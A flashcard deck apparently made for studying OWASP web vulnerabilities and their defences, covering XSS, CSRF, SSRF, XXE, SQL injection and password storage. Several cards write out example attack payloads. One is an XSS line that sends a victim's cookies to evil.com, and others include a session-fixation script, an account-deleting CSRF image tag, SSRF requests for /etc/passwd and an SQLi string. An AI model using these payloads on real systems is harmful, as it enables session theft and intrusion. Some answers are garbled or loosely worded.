OWASP part 2 Flashcards

1
Q

Exam question:
Which security guiding principle is related to the blacklisting countermeasure?

A

Be reluctant to trust

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Exam question:
Which security guiding principles are related to the encrypt sensitive information countermeasure?

A

Remember that hiding secrets are hard

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

What is the security issue of cookie-based tokens?

A

The server can only see the cookie name and value, not from which domain it was sent.

Only sees:
Cookie: NAME=VALUE

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Fill in the black: All input is ___

A

Evil

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Which vulnerability is related to session fixation attack?

A

When servers escalates anonymous session tokens without changing their value.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

What can an attacker achieve with SQLi?

A

Modification/destruction of data

Unautherized access to data, steal information

Privilege escalation

Expose database structure

DoS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

What are possible countermeasures against SQLi?

A

Prepared statements, bind variables
Mitigating impact

Not recommended to only do:
- escape
- blacklist
- whitelist

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

What does it mean to bind variables when mitigating SQLis?

A

To put one or more placeholders in the text of the SQL statement, then specify the variable (value to be used) for each placeholder.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

What are the 8 most common OWASP risk at this point in time?

A

More injection attacks - XSS

Broken access control - CSRF

SSRF

Security misconfiguration - XML external identities

SW and data integrity failures - insecure deserialization

Identification and auth failure - Broken authentication

Security logging and monitoring failures - insufficient logging and monitoring

HTML security issues - Clickjacking

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

What type of session management attacks can be achieved using XSS?

A

Session token theft

Session fixation

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

What is XSS?

A

Can occur when JS code is sent as user input and the server does not sanitize the input and echo’s it directly on the html page. This way, the user input will be interpreted as code and executed.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

How can XSS be used to steal tokens? (Token theft)

A

An attacker finds out that http://example.com/query? is vulnerable to XSS.

The attacker knows that user A uses this page alot.

The attacker sends the following link to the user:
http://example.com/query?name=

new Image().src = "http://evil.com/log?c='+document.cookie;

The attacker lures the user to click this link

When the user clicks the link, the script is echoed back to the user’s browser and executed. The user’s anonymous or logged-in cookie at example.com is logged at evil.com

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

How can XSS be used in session fixation attacks?

A

The attacker sends a request to example.com and receives back an anonymous token from the server.

At the same time, A visits the same site and receives their own anonymous cookie.

Then, the attacker sends the link to A:
http://example.com/query?name=

document.cookie = "exampleSiteToken=attackersToken"

Attacker lures A to click this link

Later, A logs in to the example.com site. If the credentials are valid, the server escalated the anonymous token, with the attackers value, to a logged-in token.

The attacker can now use their token to impersonate A.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

What are some usual sources of untrusted input?

A

Query

User/profile page

Forum/Message board

Blogs

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

What are the 2 types of XSS attacks?

A

Reflected XSS

Stored XSS

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

What is reflected XSS?

A

JS is injected into a request

The JS code is reflected immediately in the response

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
17
Q

What is stored XSS?

A

Script injected into a request, then stored somewhere on the server.
Reflected repeatedly, making it more easily spread.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
18
Q

How can XSS be mitigated?

A

Sanitize input data
Sanitize or escape data that is inserted into a web page.

Don’t rely on sanitizing only on the client side, as requests can be intercepted. Always sanitize on the server side as well.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
19
Q

What is the flow of CSRF?

A

User logs in and gets a session ID from the server:
Cookie: sessionID=1234

The user has this session open, when visiting a new site: evil.com

This site contains an image, that is not a real image, but rather refers to a transfer site of the bank
<img></img>

When the image is reflected back to the browser, the link is executed, effectively sending a request on behalf of the user. The session ID of the user is used to complete the transaction.

The attacker needs to understand how transaction requests are made from the banking app, to be able to forge a correct request.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
20
Q

What is the vulnerability that makes CSRFs possible?

A

Session management that only relies on a cookie. And the server is not able to distinguish between real and forged requests.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

How can you identify if a website is vulnerable to CSRF?

A

Identify URL to test for CSRF. For example test if you are able to delete an account on a website using csrf.

Set up different website that contains:
<img src=”http://example.com/account/del”

Create a dummy account on the original website, and log in.

With the session active, open the HTML page we just created in the same browser.

If the account was deleted -> is vulnerable

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

How can CSRF be mitigated? (4)

A

Extra authentication when doing transactions: re-authenticate

CSRF tokens(action tokens)

SameSite cookies (browser setting): Prevents cross-site cookie usage

Referer-based validation: Verifies that the request originates from own domain.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

How can we mitigate CSRF using CSRF tokens?

A

Combine tokens in the cookie and the hidden-form field. Add action token as hidden field to genuine forms. This token should not be predictable.

When a user logs in it gets a sessionID. When the user asks for the transfer form, a CSRF token is created and put in a hidden field. The form is then returned to the user.

Whenever a user issues a request from the form, both the cookie and the CSRF token are sent. The server checks both.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

What is SSRF?

A

A browser is talking to a web app that is in a trust zone with other servers or services. The server can access backend services.

The attacker sends a request to the server, which is then forwarded within the trusted zone. This request executes with the rights of the web server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Give 2 examples of SSRF requests
GET /?url=http://127.0.0.1/admin/ GET /?url=file:///etc/passwd
25
How can SSRF be countermeasured?
There is no universal fix, as it depends on the server-side implementation (application functionality and business requirements). Some approaches: - Whitelisting on server side (What IP addresses can pass through) - Handle responses from the server: e.g. make sure not to send files or passwords - Authentication between server and internal services - Network segregation
26
What is XML External Entities in regards to security misconfigurations?
When we have code that requires an XML parser. !ENTITY: External entity declaration, name of the external entity SYSTEM: Private/local URI: Location of the variable External entities refers to things that are used often in multiple documents in different parts of code. Used so that the same information does not need to be fetched multiple times from the different places.
27
Describe XML External Entities (XXE) attacks
Attack where an attacker uses malicious XML input that references an external entity that is processed by a weakly configures XML parser. Normal input: Input: Hello Output after XML parsing: Hello Malicious: Input: ]>&xxefile Output: Content of passwd file
28
How can XEE be countermeasured?
Disable processing/parsing of XML external entities and DTD (Document Type Definition) Use safe parsing libraries, or defused parsing.
29
Describe Insecure deserialization in regards to Software and data integrity failures
Attacker can tamper with network data and inject malicious payload in a serialized data stream, e.g. SQLi payload. Data stream: {"ID": " user1' or 1=1", "Course":"4237", "Grade": "C"} Server-side code: "SELECT Grade FROM student WHERE user="user 1' or 1=1"
30
How can insecure serialization be countermeasured?
Don't accept serialized objects from untrusted sources. Integrity checks: e.g. digital signatures on serialized objects Isolate and run code that serializes in low privilege environments Use JSON: data-only serialization format.
31
What is the difference between identification and authentication?
Identification: An entity telling who they are Authentication: An entity proving/verifying that they are the identity they claim to be
32
How can authentication be done?
3 ways: - Something you know - Something you have - Something you are
33
How can "Something you know" be implemented, and what are the advantages/disadvantages
Password, security questions Pros: - Simple to implement, understand and use Cons: - Easy to crack, and forget
34
How can "Something you have" be implemented, and what are the advantages/disadvantages
BankID, mobile phone (1 time password) Pros: - Hard to crack, as long as not lost Cons: - Thing can be broken, stolen or forged - If loose phone - won't be able to get a 1TP for a while -- Strength of auth depends on the difficulty of forging
35
How can "Something you are" be implemented, and what are the advantages/disadvantages
Biometrics: fingerprint, palm scan, facial recognition, usage patterns, signature dynamics Pros: - Hard to crack - Hard to steal (?): We leave our biometrics everywhere: fingerprints are not so hard to steal anymore, recorded voices/faces can be used to forge voice or facial recognition Cons: - Accuracy: False negative/False positives - Social acceptance and privacy issues - Key management - Hard to replace
36
How can passwords be cracked?
Vulnerable password storage: Passwords are often stored on files with the following format. If an attacker gets the file, all users are comprimized. Username:password
37
What is a countermeasure against password cracking?
Hashing: Stored hashed version of the password, not the plaintext version In storage: username: 923786t8732kdsbhy77832bwd11k
38
Why shouldn't the client hash the password?
If someone gets access to the hash database, they can use the hash to enter the database from the client. The server would not be able to distinguish between the hash and the entries in the database. Never trust the client. So do other security measures to protect the password in transit, rather than hashing.
39
How can hashed passwords be attacked?
Dictionary attacks: - Precompute the hash of a long list of common passwords (people tend to use the same passwords) - Compare what is in the password file to these. - This can be really quickly done offline when a password file is stored. Comparison can be run on a very fast computer.
40
What is a good defence against dictionary attack?
Concatenate the password with a random salt: password || 1212 Hash this Store the hash with the salt: username:bufeiwoiu23390234r67823:1212
41
When is salting not a good defence against dictionary attacks?
Against offline attacks. When the attacker gets access to the password file where both the hashed password and the salt is used. Salt is stored in plaintext in the password file. This way the attacker can just use the salt they have found and run the same attacks.
42
When is salting a good defence against dictionary attacks?
Against online attacks, where an attacker does not have access to the record containing the salt (file or db record).
43
Why do we store the salt in plaintext, and not a hashed version?
You need the original salt to compare the password with the stored hashed version of the password.
44
What is a rainbow table?
The precomputed hash tables of common passwords
45
Why is dictionary attacks not as efficient when using a salt?
Need to compute a rainbow table for every salt.
46
How can we make hashed passwords even more secure?
Using a pepper. A pepper is a secure value that is appended to the password before it is hashed. Unlike salts, the pepper is the same for every user and is not saved in the password file. The pepper is stored in an encrypted form in another secure place. hash(password || pepper|| salt)
47
What are the benefits of using peppers in password storage?
Makes the password longer and more complex. Defend against offline attacks better: - pepper is stored encrypted in another location - If the attacker steals the password file, the pepper is still unknown
48
Why is still additional password security required, besides salt and pepper?
Dictionary attacks are still possible, just requires more computing power
49
What are some additional password security techinques?
Combine password security with other authentication countermeasures such as: - Filtering - Limiting the number of logins - Aging password - 2FA or multichannel auth - Last login/protective monitoring - 1 time password
50
What is password filtering
When creating a password, it must meet some minimum requirements. Length, mix of characters, case Measure the strength: weak, medium, strong
51
What is Limiting the number of logins?
Lockout user after a certain number of login-trials This is inconvenient to forgetful user
52
What attack can be done on a system that limits the number of logins?
DoS: Lockout legitimate users by attempting login until they are locked out
53
What is login throttling?
Each time login fails, the user must wait a longer time to try again. Inconvenient, but prevents users from being locked out
54
What is last login/protective monitoring?
Notify users of suspicious login (login date, time, location) Educate users to pay attention Educate users to report possible attacks
55
What are aging passwords?
Policy that requires users to change passwords every now and then. Cons: - People tend to forget passwords more often - Users find workarounds: repeat passwords, incrementing, easy to guess adjustments
56
What are one-time passwords?
Login with different password each time Through SMS or device (e.g. bankID) Work as long as the user has access to the devie
57
What is 2FA, two-channel
Combines 2 or more ways of authentication Often: password + 1 time passwords password + bankID
58
What is a common password attack vector?
Go through the forgot-password functionality. As a developer, need to think about how this process can be made safe
59
What are some common ways of doing password recovery?
URL tokens: Expiration date is important PINs Offline methods: e.g. show up at office to confirm password Security questions (not a good idea, a lot of these information is available to the public)
60
What is the tradeoffs in authentication?
Authentication security and usability
61
What is CAPTCHA and reCAPTCHA
Completely Automated Public Turing test to tell Computers and Humans Apart Used to block bots. Machines are not good at solving captchas, but are getting better with machine learning.
62
Name 6 authentication and password test cases
Testing vulnerable remember password Testing for browser cache weakness Testing for weak password policy Testing for weak security question/answer Testing for weak password change or reset functionality Testing for waker auth in alternative channel
63
What is Insufficient logging and monitoring, in regards to security logging and monitoring?
Typical vulnerabilities: logins, failed logins, high-value transactions are not logged at all Warning and errors generate no, inadequate or unclear log messages Logs are not monitored properly Logs are only stored locally. This makes it easier for an attacker to wipe the logs, and makes it difficult to monitor the logs properly. Appropriate alerting thresholds and response escalation processes are not in place or effective. Need to have a real-time response. Systems are weak if they are unable to detect, escalate, or alert for active threats in real. time or near real time.
64
What is Clickjacking in regards to HTML security issues?
When someone puts an invisible website on top of a website with legit content, as an iframe. The user might think they are clicking on a button, when they actually are clicking on the iframe. Use iframe and opacity Top layer: What attacker wants you to click on, opacity 0 Bottom layer: What the user sees, opacity 1
65
What are some countermeasures against click jacking?
"X-Frame-Options: deny" Use this in the header of the legit site, this completely disables the loading of the page in a frame